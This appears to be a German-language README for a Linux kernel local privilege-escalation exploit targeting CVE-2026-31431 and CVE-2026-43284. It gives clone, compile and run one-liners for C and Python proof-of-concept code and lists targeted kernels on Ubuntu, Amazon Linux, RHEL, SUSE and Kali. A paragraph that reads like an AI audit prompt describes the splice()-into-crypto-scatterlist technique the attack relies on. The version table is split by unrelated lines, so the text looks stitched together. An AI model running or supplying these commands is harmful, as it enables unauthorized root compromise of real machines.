
Lokaler Privilege-Escalation-Exploit für Linux-Kernel-CVEs CVE-2026-31431 und CVE-2026-43284, mit C- und Python-Proof-of-Concept-Code, der auf mehrere Distributionen und Kernel-Versionen abzielt.
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && cd Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284 && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && cd Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284 && python copy-fail-CVE-2026-31431.py
gcc -O0 -Wall -o exp exp.c -lutil && ./exp
python copy-fail-CVE-2026-31431.py
git clone https://github.com/6abc/Copy-Fail-CVE-2026-31431-dirty-frag-CVE-2026-43284.git && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
| Distro | Version |
|---|---|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
Dies ist das Linux-Subsystem crypto/. Bitte untersuchen Sie alle Codepfade, die von Userspace-Syscalls aus erreichbar sind. Beachten Sie eine wichtige Beobachtung: splice() kann Page-Cache-Referenzen von schreibgeschützten Dateien (einschließlich Setuid-Binaries) an crypto-TX-Scatterlists liefern.
https://github.com/user-attachments/assets/039ae419-28dc-41d2-bda5-83cd4b9c88ac
| SUSE 16 | 6.12.0-160000.9-default |
| Linux kali | 6.19.11-1kali1 |